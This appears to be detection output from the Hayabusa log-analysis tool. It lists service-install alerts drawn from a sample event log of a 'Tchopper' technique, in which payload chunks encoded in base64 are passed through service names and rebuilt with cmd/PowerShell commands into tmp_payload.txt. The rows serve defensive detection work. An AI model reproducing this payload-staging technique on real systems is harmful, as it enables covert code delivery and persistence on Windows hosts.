+2021-11-03 17:20:27.868 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:29.321 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:29.321 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:29.321 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:30.774 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:30.774 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:30.774 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:32.230 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:32.230 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:32.230 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:33.674 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:33.674 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:33.674 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:35.128 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:35.128 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:35.128 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:36.582 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:36.582 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:36.582 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:42.386 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:42.386 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:42.386 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:43.824 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:43.824 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:43.824 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:45.277 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:45.277 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
